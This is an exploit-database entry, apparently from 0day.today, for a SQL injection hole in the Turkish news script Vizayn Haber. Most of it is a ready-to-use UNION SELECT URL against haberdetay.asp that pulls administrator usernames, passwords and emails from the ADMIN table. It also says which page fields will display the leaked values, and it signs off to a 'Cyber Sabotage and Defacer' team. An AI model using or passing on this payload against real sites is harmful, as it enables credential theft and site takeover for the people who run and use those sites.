id: 1353
date: 01/01/2007
title: Vizayn Haber (haberdetay.asp id variable) SQL Injection Vulnerability
author: chernobiLe
cves: 

=====================================================================
Vizayn Haber (haberdetay.asp id variable) SQL Injection Vulnerability
=====================================================================



###############################################################
#Vizayn Haber (tr) == (tr) SQL Injection Vulnerability
#Author : chernobiLe
###############################################################
#Risk : High


#Exploit;
#Admin Nick, Passport, Mail;
http://[SITE]/haberdetay.asp?id=1+union+select+0,PASSWORD,EMAIL,USERNAME+from+ADMIN

#Union data Text;
#Haber Eklenme Tarihi :  USERNAME
#Haber Basligi :               PASSWORD

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM




#  0day.today [2023-03-24]  #